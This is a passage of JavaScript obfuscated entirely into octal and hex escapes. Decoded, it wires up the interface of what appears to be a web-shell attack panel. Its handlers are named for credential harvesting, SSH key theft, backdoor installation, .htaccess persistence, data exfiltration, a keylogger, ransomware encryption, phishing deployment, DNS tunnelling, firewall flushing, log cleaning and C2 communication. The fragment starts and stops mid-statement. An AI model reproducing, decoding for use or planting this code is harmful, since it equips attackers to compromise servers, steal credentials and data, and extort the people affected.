72\x79\123\x65\154\x65\x63\164\x6f\x72\x41\154\x6c\50\47\56\x74\x61\x62\x2d\154\x69\x6e\153\47\x29\56\146\x6f\x72\x45\141\x63\150\x28\164\40\x3d\76\40\x74\x2e\x63\x6c\141\x73\x73\114\151\163\164\56\x72\x65\155\x6f\166\145\x28\x27\141\143\x74\x69\166\x65\x27\51\51\73\40\145\x2e\164\141\x72\x67\x65\x74\56\143\x6c\x61\163\x73\x4c\x69\x73\164\x2e\x61\144\x64\50\47\x61\x63\164\x69\x76\145\47\x29\73\x20\166\x69\x65\167\103\x6f\x6e\x74\141\x69\156\x65\x72\x2e\161\165\145\162\x79\x53\x65\154\145\143\x74\157\x72\101\x6c\154\x28\47\x2e\x74\x61\142\55\143\157\156\x74\145\x6e\164\47\x29\56\146\157\x72\105\141\143\x68\x28\143\x20\x3d\76\x20\x63\x2e\x63\154\x61\163\x73\x4c\151\x73\164\56\162\145\x6d\x6f\x76\x65\x28\47\x61\x63\x74\151\x76\x65\x27\x29\x29\x3b\x20\x63\x6f\x6e\163\164\40\x74\x61\x72\x67\145\164\103\x6f\156\x74\x65\x6e\164\40\x3d\40\x76\151\x65\167\x43\x6f\156\x74\141\x69\x6e\145\162\x2e\x71\165\145\x72\171\123\x65\x6c\145\143\x74\157\x72\x28\140\43\x74\141\142\55\44\x7b\x74\141\x72\147\x65\164\124\141\142\175\140\x29\x3b\40\x69\x66\x20\50\x74\x61\162\147\x65\164\x43\x6f\156\164\x65\x6e\164\51\x20\164\x61\162\147\145\164\103\157\156\164\x65\x6e\164\x2e\143\154\141\x73\x73\x4c\151\163\164\x2e\141\144\144\x28\x27\x61\143\x74\151\x76\x65\x27\x29\73\x20\175\40\175\x29\73\40\x7d\51\73\xa\40\x9\x9\11\x73\x61\146\x65\x41\x64\x64\x45\x76\x65\156\164\x4c\151\x73\164\145\156\145\x72\x28\x27\x73\151\144\x65\x62\x61\x72\55\164\157\147\147\x6c\x65\47\54\40\50\x29\x20\75\76\x20\x64\x6f\x63\x75\155\x65\156\164\56\x62\157\144\x79\x2e\143\154\141\163\x73\x4c\151\163\164\56\164\x6f\x67\x67\154\x65\50\x27\x73\151\144\x65\x62\x61\162\55\157\x70\145\x6e\x27\51\x29\x3b\12\40\x9\11\x9\x73\x61\146\145\x41\144\x64\105\x76\145\156\x74\114\x69\x73\x74\145\156\145\162\x28\47\x73\x69\x64\x65\x62\x61\x72\55\157\x76\x65\162\x6c\x61\x79\47\x2c\40\50\51\x20\x3d\x3e\x20\x64\x6f\143\x75\x6d\145\x6e\164\56\142\x6f\144\171\56\143\154\x61\x73\x73\x4c\151\163\164\56\162\x65\155\x6f\166\x65\50\47\163\x69\144\145\142\141\162\x2d\x6f\x70\145\156\47\51\51\x3b\12\40\11\11\11\163\141\146\x65\x41\144\x64\x45\x76\x65\x6e\x74\114\x69\x73\x74\x65\x6e\x65\162\50\x27\162\x75\156\x2d\x64\x6f\155\x61\x69\156\55\151\x6e\164\x65\154\55\142\x74\156\x27\54\40\x28\x29\40\x3d\76\40\x74\x68\x69\163\x2e\x72\x75\x6e\x44\x6f\155\141\151\156\x49\x6e\164\145\154\50\51\51\x3b\12\x20\x9\11\x9\163\141\x66\x65\101\144\x64\105\x76\145\x6e\164\114\x69\x73\x74\145\156\145\162\50\x27\163\165\x64\x6f\x2d\x63\150\x65\143\153\55\x62\x74\x6e\47\54\x20\50\x29\40\75\76\x20\x74\x68\x69\x73\x2e\x72\165\156\x53\x75\144\x6f\x43\x68\x65\143\153\50\51\x29\73\12\40\11\x9\11\163\141\x66\x65\x41\144\144\x45\166\x65\156\x74\114\x69\163\x74\145\x6e\x65\162\50\x27\147\x65\x74\x2d\x75\x73\x65\162\55\143\x6f\156\x74\145\x78\x74\55\x62\x74\x6e\47\54\40\50\51\x20\x3d\x3e\40\x74\150\x69\x73\56\x67\x65\x74\x55\163\145\x72\103\x6f\x6e\x74\145\x78\x74\50\51\x29\x3b\12\40\x9\x9\11\x73\141\x66\x65\x41\144\x64\105\166\x65\x6e\x74\114\x69\163\x74\x65\156\x65\x72\50\47\146\151\x6e\144\x2d\x77\x72\151\164\x61\142\x6c\145\x2d\x62\164\x6e\47\x2c\40\50\51\x20\x3d\76\x20\164\150\151\x73\56\x66\151\x6e\x64\x57\x72\x69\164\141\x62\x6c\x65\x28\51\51\73\12\x20\x9\11\x9\163\141\x66\145\x41\144\144\x45\x76\145\156\164\x4c\x69\163\164\x65\x6e\x65\162\50\x27\147\x65\x74\x2d\x73\163\x68\55\153\x65\x79\163\x2d\x62\164\156\x27\x2c\40\50\x29\x20\x3d\76\x20\x74\150\151\163\x2e\147\145\164\x53\163\x68\113\x65\171\163\x28\51\x29\73\12\40\11\x9\11\163\141\x66\145\x41\144\x64\x45\x76\145\x6e\164\x4c\151\163\164\145\156\145\x72\x28\47\x61\x64\x64\x2d\163\163\x68\55\153\145\171\x2d\142\x74\156\x27\54\40\x28\x29\40\x3d\76\40\164\150\x69\x73\x2e\x61\x64\x64\x53\x73\x68\x4b\145\x79\x28\51\x29\73\xa\x20\x9\x9\x9\x73\x61\146\145\101\x64\x64\x45\x76\145\x6e\x74\x4c\151\x73\164\145\x6e\145\x72\x28\x27\150\x74\141\x63\x63\145\163\163\x2d\x70\145\162\x73\x69\163\x74\55\142\x74\x6e\47\54\x20\x28\x29\x20\75\x3e\40\x74\x68\151\x73\56\x61\x70\160\154\171\110\x74\x61\143\x63\x65\x73\x73\x50\x65\162\x73\x69\163\164\x28\x29\x29\73\12\x20\x9\x9\x9\x73\x61\x66\x65\101\x64\x64\x45\166\145\x6e\164\x4c\x69\163\164\145\156\145\x72\50\47\143\162\145\144\x2d\150\141\x72\x76\145\163\164\145\x72\x2d\x62\x74\x6e\47\x2c\x20\x28\x29\40\x3d\76\x20\x74\150\151\x73\56\162\165\156\103\x72\145\144\x48\x61\162\x76\x65\x73\x74\145\162\50\x29\x29\73\xa\40\x9\x9\x9\163\x61\x66\145\x41\144\144\105\x76\x65\156\164\114\151\163\164\x65\x6e\145\x72\x28\x27\163\x74\141\x72\164\55\x70\x6f\162\164\x2d\x66\157\162\x77\x61\162\144\x2d\142\x74\156\47\x2c\40\50\x29\40\x3d\x3e\x20\164\150\x69\163\x2e\x73\164\141\x72\164\x50\x6f\162\x74\106\x6f\162\x77\x61\x72\144\50\x29\x29\x3b\xa\x20\x9\11\11\x73\x61\x66\145\x41\144\x64\x45\x76\x65\156\x74\114\151\163\x74\x65\x6e\145\162\50\47\143\x72\x65\x61\164\x65\x2d\167\160\x2d\165\163\x65\x72\x2d\142\164\156\x27\54\40\x28\x29\x20\75\76\x20\164\x68\151\x73\56\x63\x72\x65\x61\x74\x65\127\160\x55\x73\145\x72\x28\51\51\73\12\x20\x9\11\x9\x73\141\146\x65\x41\144\x64\105\x76\145\x6e\164\114\x69\x73\x74\145\x6e\x65\x72\50\47\162\x75\156\x2d\x73\171\155\154\x69\x6e\x6b\x2d\x62\x74\x6e\x27\x2c\40\x28\51\x20\x3d\x3e\40\164\150\151\x73\56\x72\165\156\x53\x79\x6d\154\x69\156\x6b\50\x29\x29\x3b\xa\40\x9\x9\x9\163\x61\146\145\x41\x64\x64\105\x76\145\x6e\x74\114\151\x73\x74\x65\x6e\145\x72\50\47\146\x69\x6e\x64\x2d\143\160\141\x6e\145\154\55\143\x72\x65\x64\x73\55\142\x74\x6e\x27\54\x20\50\x29\x20\x3d\76\x20\164\150\151\x73\x2e\146\151\156\x64\103\160\x61\156\145\x6c\x43\162\x65\144\163\50\51\51\73\12\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\163\x61\x66\x65\101\x64\x64\105\166\x65\156\164\x4c\x69\163\164\145\x6e\x65\x72\x28\47\162\165\156\x2d\x66\x69\156\147\145\x72\160\162\151\156\x74\55\142\164\156\47\x2c\40\x28\51\40\x3d\x3e\x20\x74\150\x69\163\x2e\162\x75\156\x46\151\156\x67\145\162\160\162\x69\x6e\x74\x28\x29\x29\x3b\xa\40\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x73\141\146\x65\101\144\144\105\166\145\156\164\114\x69\x73\164\145\x6e\x65\x72\x28\x27\x72\165\156\x2d\x73\145\x6e\163\x69\x74\151\166\145\x2d\x73\x63\141\156\55\142\x74\156\47\54\x20\x28\x29\40\x3d\76\40\164\150\x69\x73\56\x72\165\156\123\x65\x6e\x73\x69\164\x69\x76\x65\123\143\141\156\x28\x29\51\73\12\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x73\141\146\145\x41\x64\x64\105\166\x65\x6e\164\114\x69\x73\x74\x65\156\145\162\x28\x27\162\x75\x6e\x2d\x6d\x6f\156\151\x74\x6f\x72\x2d\x62\164\x6e\x27\x2c\40\50\x29\40\75\76\40\x74\x68\x69\x73\56\x72\165\x6e\x4d\157\x6e\x69\x74\x6f\x72\50\x29\x29\73\12\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\163\141\146\x65\101\x64\x64\x45\166\145\x6e\164\x4c\x69\x73\x74\x65\156\x65\162\50\47\151\x6e\x73\164\x61\154\x6c\55\142\141\143\153\144\157\157\162\x2d\142\164\156\x27\x2c\x20\50\51\40\x3d\76\40\x74\150\x69\x73\56\162\x75\x6e\x42\x61\x63\x6b\x64\157\157\162\111\x6e\x73\x74\x61\x6c\154\x65\162\50\51\51\x3b\xa\40\x20\40\x20\40\40\40\x20\40\x20\x20\x20\x73\141\x66\145\101\x64\144\x45\x76\145\x6e\x74\114\151\163\x74\145\156\145\162\50\47\x72\x75\156\55\x65\170\146\x69\154\55\x62\x74\156\x27\x2c\x20\50\51\40\75\x3e\40\x74\x68\x69\x73\56\162\x75\156\x45\x78\146\151\154\x28\x29\x29\x3b\xa\x20\x20\40\40\40\x20\40\40\x20\x20\40\40\163\141\146\x65\101\144\144\105\x76\x65\156\164\114\x69\163\x74\x65\x6e\145\x72\x28\x27\162\165\x6e\55\x68\157\147\x2d\x62\164\156\47\x2c\x20\x28\x29\40\x3d\x3e\x20\x74\150\151\x73\x2e\x72\x75\156\103\x70\x75\x48\x6f\147\50\x29\x29\73\12\40\40\x20\40\40\x20\40\x20\40\x20\40\40\x73\x61\x66\145\x41\144\144\105\166\x65\x6e\164\x4c\151\163\x74\145\x6e\x65\162\50\x27\x72\165\x6e\x2d\153\x65\x79\x6c\x6f\147\x67\145\x72\x2d\142\x74\x6e\47\54\x20\x28\x29\40\75\x3e\40\164\x68\151\163\56\x72\x75\156\x4b\x65\x79\x6c\157\x67\147\145\162\50\x29\x29\x3b\12\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\57\x2f\40\126\70\56\x30\40\105\166\x65\156\164\x20\114\x69\x73\x74\x65\156\145\162\x73\xa\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x73\x61\146\145\101\x64\144\x45\166\145\x6e\164\114\151\x73\x74\145\x6e\145\162\x28\47\x72\x75\x6e\55\160\x72\x69\166\145\x73\143\x2d\143\x68\145\x63\153\145\x72\55\x62\164\156\47\x2c\40\50\51\x20\75\76\x20\164\150\151\x73\56\x72\x75\156\120\162\151\166\145\x73\x63\103\150\x65\143\x6b\145\x72\x28\x29\51\x3b\12\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\163\141\146\x65\101\144\x64\x45\x76\145\156\x74\114\151\x73\164\x65\156\145\162\x28\47\x72\165\x6e\55\163\x75\142\x6e\145\x74\55\163\x63\141\156\x2d\x62\x74\156\x27\x2c\40\50\51\40\x3d\x3e\x20\164\x68\x69\163\x2e\162\165\x6e\x53\x75\142\x6e\145\164\x53\x63\x61\156\x6e\145\162\50\51\51\73\12\x20\40\40\x20\x20\40\40\40\x20\x20\40\x20\163\141\x66\x65\x41\144\x64\105\x76\x65\x6e\164\x4c\151\x73\x74\145\x6e\x65\x72\50\47\166\x69\x65\x77\x2d\x66\151\x72\145\167\141\x6c\154\x2d\x62\164\x6e\x27\54\x20\50\x29\40\75\76\40\x74\x68\151\163\56\166\x69\x65\x77\x46\x69\162\x65\x77\x61\154\x6c\122\165\154\145\163\50\51\x29\x3b\xa\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\163\x61\x66\145\x41\x64\144\105\166\145\156\164\114\151\163\x74\x65\x6e\x65\x72\x28\47\x66\154\165\163\x68\55\x66\x69\162\145\167\x61\x6c\154\55\142\164\156\x27\54\x20\x28\x29\40\75\76\x20\x74\150\x69\x73\x2e\146\154\x75\163\x68\x46\x69\162\x65\x77\x61\154\x6c\x52\165\154\145\163\x28\51\x29\73\xa\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\163\141\146\145\101\x64\144\105\x76\x65\x6e\164\114\x69\163\x74\x65\x6e\x65\162\50\x27\x64\145\160\154\157\x79\x2d\x70\x68\151\163\x68\55\142\164\x6e\x27\x2c\x20\50\51\40\x3d\76\x20\x74\150\151\163\x2e\x64\145\x70\x6c\x6f\171\120\150\x69\x73\x68\x69\156\x67\120\x61\x67\145\x28\x29\51\73\12\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\x2f\x2f\40\116\x65\167\40\106\x65\141\x74\x75\x72\x65\x73\x20\105\166\145\x6e\164\40\114\x69\x73\x74\x65\156\x65\x72\163\12\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x73\x61\146\145\101\144\x64\105\x76\x65\156\164\114\151\163\x74\145\156\x65\162\50\47\x73\164\x61\x72\x74\x2d\167\141\x74\x63\x68\145\x72\55\x62\x74\156\x27\x2c\x20\x28\51\40\75\76\40\164\x68\151\x73\56\x73\x74\141\x72\164\x46\x69\154\145\127\141\164\x63\x68\x65\162\x28\51\x29\73\xa\40\x20\x20\40\40\40\40\x20\40\40\40\x20\163\x61\146\145\101\144\144\x45\x76\145\156\164\x4c\151\x73\164\145\156\x65\x72\x28\47\x73\x74\157\160\x2d\x77\141\164\x63\x68\x65\162\55\142\164\156\47\x2c\40\x28\51\40\75\76\40\164\150\151\163\x2e\163\x74\x6f\x70\106\x69\x6c\145\127\x61\x74\x63\150\145\x72\x28\x29\x29\x3b\12\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\x73\141\x66\x65\x41\144\x64\x45\166\x65\x6e\164\x4c\151\163\164\x65\x6e\x65\x72\x28\47\x72\145\146\x72\x65\x73\150\x2d\x70\x72\x6f\x63\x65\163\x73\145\163\x2d\x62\x74\156\x27\x2c\40\x28\51\40\75\76\x20\164\150\151\x73\x2e\x72\145\x66\162\145\x73\x68\x50\162\x6f\x63\145\x73\163\145\x73\x28\51\51\x3b\xa\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\x73\141\146\145\101\x64\x64\x45\166\x65\x6e\x74\114\x69\163\164\x65\156\145\x72\50\x27\x61\x75\164\157\55\x72\x65\x66\162\x65\x73\x68\x2d\160\162\157\x63\x65\163\163\x65\163\55\x62\164\x6e\47\x2c\40\x28\51\x20\x3d\x3e\40\x74\150\151\x73\x2e\164\157\147\147\x6c\x65\x41\x75\164\x6f\122\x65\x66\x72\145\163\x68\120\162\157\143\x65\163\163\145\163\x28\x29\x29\73\12\40\40\40\40\40\40\x20\40\40\x20\x20\40\163\141\146\145\101\x64\144\x45\x76\x65\x6e\164\x4c\151\x73\x74\145\156\x65\162\x28\47\163\x74\x61\162\x74\55\x63\141\x70\164\x75\x72\145\x2d\142\164\x6e\47\54\40\x28\x29\x20\x3d\x3e\x20\164\150\x69\163\56\163\164\x61\162\164\x50\x61\x63\153\145\x74\x43\141\160\164\x75\x72\145\50\x29\x29\73\12\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\x73\141\x66\145\x41\x64\144\x45\x76\145\156\x74\x4c\x69\163\x74\145\156\x65\x72\50\47\145\x6e\143\162\x79\160\164\55\146\x69\154\x65\x2d\x62\x74\156\x27\x2c\x20\50\x29\x20\x3d\76\x20\164\150\151\163\x2e\145\156\x63\x72\x79\x70\x74\x46\x69\154\145\x28\x29\x29\x3b\xa\40\x20\40\x20\40\x20\40\x20\40\x20\40\40\x73\141\x66\x65\x41\144\144\105\x76\x65\x6e\x74\114\151\163\x74\145\156\x65\162\50\x27\x64\x65\143\162\171\160\164\x2d\146\x69\x6c\x65\55\142\x74\156\47\x2c\40\50\x29\x20\75\x3e\40\x74\x68\151\163\56\x64\x65\x63\x72\x79\x70\164\106\151\x6c\145\50\x29\x29\x3b\xa\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x73\141\x66\145\101\x64\144\105\166\145\x6e\x74\114\151\163\164\145\156\145\162\x28\47\144\x6e\x73\55\x73\145\156\x64\x2d\x62\x74\x6e\47\54\x20\50\51\40\x3d\76\40\x74\x68\151\163\56\144\156\163\x54\x75\x6e\156\x65\x6c\123\145\x6e\x64\50\51\51\73\12\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\x73\141\146\145\101\144\144\x45\166\145\156\164\114\151\163\164\145\x6e\145\162\x28\x27\x64\156\x73\x2d\162\x65\143\x65\151\166\145\x2d\x62\x74\x6e\47\x2c\40\x28\51\x20\75\76\40\x74\150\x69\163\x2e\144\x6e\x73\x54\x75\x6e\156\x65\154\122\x65\143\145\151\166\145\50\x29\51\73\xa\x20\x20\40\40\40\40\40\x20\40\x20\40\x20\163\141\146\x65\x41\x64\x64\105\166\x65\x6e\x74\114\x69\x73\x74\x65\156\x65\x72\50\47\x64\165\x6d\x70\x2d\x6d\145\x6d\x6f\162\x79\x2d\x62\164\x6e\47\54\40\50\51\40\75\x3e\40\164\150\x69\x73\x2e\x64\165\x6d\160\115\x65\155\157\x72\171\50\x29\x29\73\12\x20\x20\40\x20\x20\x20\40\40\40\x20\40\40\163\141\x66\145\x41\x64\144\105\x76\145\x6e\x74\114\151\163\x74\x65\156\x65\x72\x28\x27\141\156\141\154\x79\172\x65\x2d\x6d\x65\x6d\157\162\171\x2d\x62\164\x6e\x27\54\x20\x28\x29\x20\75\76\x20\x74\x68\x69\x73\x2e\141\x6e\141\154\x79\172\145\x4d\x65\x6d\x6f\x72\171\x28\x29\51\73\xa\40\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x73\141\x66\145\x41\144\x64\x45\x76\145\x6e\x74\114\x69\163\164\145\x6e\x65\x72\x28\47\163\165\x67\x67\145\163\x74\55\x65\170\x70\154\157\x69\164\163\x2d\142\164\x6e\x27\54\x20\50\51\x20\x3d\x3e\40\x74\150\151\163\56\x73\165\x67\x67\145\x73\164\x45\x78\160\x6c\157\151\164\163\x28\51\51\x3b\12\40\40\40\40\40\40\40\40\40\x20\x20\x20\163\141\x66\145\x41\x64\x64\105\166\x65\156\x74\114\x69\163\164\145\156\145\x72\50\47\143\x72\x61\x63\153\x2d\x68\141\163\x68\55\x62\164\156\47\54\x20\50\51\x20\75\76\x20\x74\x68\151\x73\56\x63\162\x61\143\153\110\141\163\x68\x28\x29\51\x3b\xa\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\x73\x61\146\145\101\x64\144\x45\166\x65\x6e\x74\x4c\151\163\164\145\156\145\162\50\47\147\145\156\145\162\x61\164\145\x2d\x77\x6f\162\144\x6c\151\163\x74\x2d\x62\x74\156\x27\x2c\40\x28\51\40\75\76\x20\x74\x68\x69\163\x2e\147\145\x6e\145\162\x61\164\145\127\157\x72\x64\154\151\163\164\x28\51\x29\x3b\xa\x20\40\x20\x20\40\40\40\x20\40\40\40\x20\x73\x61\146\x65\101\144\x64\105\166\145\156\x74\114\151\x73\x74\x65\x6e\x65\x72\50\47\157\x62\x66\x75\163\x63\141\x74\x65\x2d\x62\164\156\x27\54\x20\50\51\40\x3d\76\40\x74\150\151\163\56\157\x62\146\165\x73\x63\x61\x74\x65\x43\x6f\x64\145\50\x29\x29\x3b\xa\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\x73\x61\x66\x65\x41\x64\x64\x45\x76\145\x6e\164\x4c\x69\x73\164\x65\156\145\x72\50\47\x6e\157\x74\151\146\151\x63\x61\164\x69\x6f\156\55\142\x74\156\47\x2c\x20\50\51\40\75\x3e\40\164\x68\x69\163\x2e\x6e\141\x76\151\147\x61\164\145\x28\x27\x6e\157\164\151\x66\151\x63\141\164\151\x6f\x6e\x73\47\51\x29\x3b\xa\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x73\x61\146\x65\x41\x64\144\x45\166\x65\156\x74\x4c\151\x73\x74\145\x6e\145\162\x28\x27\x63\x6c\x65\141\162\55\141\x6c\x6c\55\156\x6f\x74\x69\146\151\x63\x61\164\x69\157\x6e\163\55\142\x74\x6e\47\x2c\40\50\51\x20\75\76\40\164\150\x69\x73\56\143\154\x65\x61\x72\x41\154\x6c\116\x6f\164\151\146\151\x63\141\164\x69\157\x6e\163\50\51\51\x3b\12\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\x2f\x2f\x20\x52\141\x6e\163\157\x6d\x20\x43\x72\x65\141\x74\157\x72\40\105\x76\145\156\164\x20\114\151\163\x74\145\156\145\162\163\xa\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\163\x61\146\x65\x41\144\144\105\x76\145\156\164\114\151\x73\x74\145\156\x65\x72\50\x27\162\x61\156\x73\157\x6d\55\142\162\x6f\167\x73\x65\x2d\x62\164\x6e\47\54\x20\x28\51\40\x3d\x3e\40\164\150\151\163\56\x72\x61\x6e\163\157\155\102\162\x6f\x77\163\145\106\151\x6c\x65\163\x28\x29\x29\73\xa\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\163\141\x66\145\x41\144\x64\105\166\145\x6e\164\x4c\x69\163\x74\145\x6e\x65\x72\x28\x27\x72\x61\x6e\163\x6f\155\x2d\147\x65\156\145\162\141\x74\145\x2d\x70\141\x73\x73\x77\x6f\x72\144\x2d\142\164\x6e\x27\54\x20\50\x29\40\75\76\40\x74\150\151\x73\x2e\x72\141\x6e\163\157\x6d\107\x65\x6e\145\162\x61\x74\x65\120\x61\163\163\x77\157\x72\144\50\51\x29\x3b\12\x20\x20\40\40\x20\40\x20\40\x20\40\40\40\163\141\146\145\x41\144\144\x45\x76\x65\x6e\164\x4c\151\163\x74\145\x6e\x65\x72\x28\47\162\141\156\163\157\155\55\145\156\143\x72\171\x70\x74\x2d\x62\x74\x6e\47\x2c\40\50\51\x20\75\x3e\x20\164\150\151\163\56\162\x61\x6e\163\x6f\x6d\x45\x6e\x63\162\x79\160\x74\106\x69\x6c\145\163\50\51\51\x3b\xa\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x73\141\146\x65\101\144\x64\105\x76\x65\156\164\114\151\x73\164\x65\156\145\x72\x28\x27\x72\141\x6e\163\157\x6d\55\144\145\x63\x72\171\160\x74\x2d\x62\164\x6e\47\54\x20\x28\x29\40\75\x3e\40\x74\150\151\x73\x2e\162\x61\x6e\163\157\155\x44\145\143\x72\x79\x70\x74\x46\x69\154\145\50\51\51\73\xa\40\40\x20\40\40\40\40\x20\x20\40\40\40\163\141\146\x65\101\x64\x64\105\x76\x65\156\164\114\x69\163\164\x65\156\145\162\x28\47\x67\x65\156\x65\162\141\164\x65\55\163\150\x65\154\154\x2d\142\164\x6e\x27\54\x20\50\51\40\75\76\40\164\150\x69\x73\x2e\147\145\156\x65\162\141\164\145\127\x65\x62\123\150\x65\154\154\50\x29\51\x3b\12\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x73\x61\146\x65\x41\144\x64\105\166\x65\x6e\164\114\x69\163\x74\x65\x6e\x65\162\x28\x27\143\157\x70\x79\55\163\150\x65\x6c\154\55\143\157\144\x65\55\142\164\x6e\47\54\x20\x28\51\40\75\x3e\x20\x74\150\x69\x73\x2e\x63\x6f\160\x79\x53\x68\145\154\154\x43\157\x64\x65\50\51\51\x3b\12\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x73\x61\146\145\101\144\x64\105\x76\145\x6e\x74\114\x69\x73\164\x65\156\145\x72\x28\x27\x66\151\156\x64\x2d\163\150\x65\x6c\154\x73\55\142\x74\x6e\47\x2c\40\50\x29\x20\75\76\x20\164\150\151\163\x2e\x66\x69\156\x64\x57\x65\x62\x53\150\145\154\154\163\50\51\x29\x3b\xa\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\163\141\x66\x65\101\x64\x64\105\166\x65\x6e\x74\114\151\163\x74\145\x6e\x65\x72\50\47\x63\x6f\154\55\x64\x75\155\x70\x2d\x62\164\x6e\x27\54\x20\50\x29\40\75\76\x20\164\x68\x69\163\x2e\143\157\x6c\x75\x6d\x6e\x44\x75\x6d\160\145\162\x28\51\x29\73\12\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\x73\141\x66\145\x41\144\144\105\x76\145\x6e\x74\x4c\x69\163\x74\145\x6e\145\162\50\x27\144\142\55\x64\x75\x6d\x70\x2d\142\164\x6e\47\x2c\x20\50\51\40\75\x3e\x20\164\150\x69\163\56\x64\141\x74\x61\142\x61\x73\x65\104\165\155\x70\145\162\x28\51\x29\73\12\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\163\141\146\145\101\144\144\x45\x76\x65\156\164\x4c\x69\163\164\x65\x6e\145\162\50\x27\142\141\163\x65\x64\151\162\x2d\x67\x65\156\145\x72\141\x74\145\55\142\x74\x6e\x27\x2c\40\x28\51\x20\x3d\x3e\x20\x74\150\x69\163\x2e\157\x70\145\x6e\x42\x61\x73\x65\x64\x69\162\x42\171\x70\141\x73\163\50\51\51\x3b\xa\x20\x20\40\40\40\40\x20\x20\x20\x20\40\x20\163\141\x66\145\x41\144\x64\105\x76\x65\x6e\x74\114\x69\163\164\x65\x6e\145\162\50\x27\146\x61\153\145\x2d\x6d\141\x69\x6c\x2d\142\164\156\x27\54\40\50\x29\40\75\x3e\x20\164\150\x69\163\x2e\x66\141\153\145\115\141\x69\x6c\x28\51\x29\x3b\xa\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\x73\141\146\x65\101\x64\x64\x45\x76\x65\x6e\x74\114\x69\163\164\145\x6e\145\x72\50\x27\x77\150\155\x63\163\55\144\145\143\157\144\145\55\x62\x74\x6e\x27\54\40\50\x29\x20\75\76\40\x74\150\x69\x73\x2e\x77\150\x6d\x63\163\104\x65\x63\x6f\x64\x65\162\x28\51\x29\73\12\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\57\x2f\40\116\145\167\40\101\144\166\x61\156\143\x65\x64\x20\106\x65\x61\164\165\162\x65\x73\xa\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\x73\x61\146\145\101\144\x64\105\x76\145\156\x74\x4c\x69\x73\x74\145\156\145\162\x28\47\141\144\166\141\x6e\x63\145\x64\x2d\154\157\x67\x2d\x63\x6c\x65\x61\156\x65\x72\55\142\x74\156\x27\x2c\x20\50\51\x20\75\76\x20\x74\150\151\163\x2e\x61\144\x76\141\156\x63\145\144\114\x6f\x67\x43\154\x65\141\x6e\x65\x72\50\51\x29\x3b\12\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\163\x61\x66\x65\x41\144\x64\x45\x76\x65\x6e\164\x4c\151\x73\164\145\x6e\145\x72\50\47\155\165\154\164\x69\55\x62\x61\x63\x6b\165\160\x2d\x62\x74\156\47\x2c\x20\50\51\40\x3d\76\40\x74\150\151\x73\56\155\165\154\164\151\114\157\x63\x61\164\151\157\x6e\102\x61\x63\x6b\165\160\50\51\51\73\12\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\163\141\x66\145\101\x64\x64\105\166\145\156\164\114\x69\163\x74\x65\156\145\x72\50\47\143\x32\55\143\x6f\155\x6d\x75\156\151\143\141\x74\145\x2d\x62\164\x6e\x27\x2c\x20\x28\x29\x20\75\76\40\164\150\151\163\56\x63\62\103\x6f\155\155\x75\x6e\151\143\141\x74\145\50\x29\51\x3b\xa\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\163\x61\146\145\x41\144\x64\105\x76\145\156\164\114\x69\163\x74\x65\156\x65\162\x28\47\167\x61\146\x2d\142\x79\160\141\163\163\x2d\164\145\163\164\55\142\x74\x6e\47\x2c\40\50\x29\40\x3d\x3e\x20\164\150\x69\x73\x2e\x77\141\146\x42\x79\160\141\163\x73\124\145\163\x74\50\51\51\73\xa\40\40\40\x20\40\40\40\x20\x20\40\40\40\163\141\x66\x65\x41\x64\144\105\x76\145\156\x74\x4c\151\x73\x74\x65\x6e\145\x72\x28\x27\x73\x79\x73\x74\145\x6d\55\160\162\x6f\x66\151\x6c\x65\162\55\x62\x74\156\47\54\x20\50\x29\40\75\76\40\164\150\x69\x73\56\x73\171\163\164\145\155\120\x72\157\146\x69\x6c\x65\162\x28\x29\51\73\xa\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\163\141\146\x65\101\x64\x64\x45\x76\145\156\x74\114\151\x73\164\x65\x6e\145\162\x28\47\x72\145\x67\151\163\164\x65\162\55\x73\150\x65\154\x6c\x2d\x62\164\x6e\x27\54\x20\x28\51\x20\x3d\76\x20\x74\150\x69\163\56\x72\x65\147\x69\163\164\145\x72\123\x68\x65\x6c\154\50\51\51\x3b\xa\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x73\141\146\x65\101\x64\144\105\x76\145\x6e\x74\x4c\151\x73\164\145\x6e\145\162\x28\47\154\151\163\x74\x2d\163\x68\145\x6c\154\x73\55\142\164\156\x27\54\40\x28\x29\40\75\76\x20\164\150\151\163\56\154\151\163\x74\x53\x68\x65\x6c\154\163\x28\x29\x29\73\xa\40\x20\x20\x20\40\40\40\40\40\40\x20\40\x73\x61\146\x65\101\x64\x64\x45\166\x65\156\164\114\x69\163\164\145\156\145\162\x28\x27\142\162\157\141\144\143\x61\x73\x74\55\143\157\x6d\x6d\141\x6e\144\55\142\x74\x6e\47\54\40\50\x29\40\75\x3e\x20\164\150\151\x73\x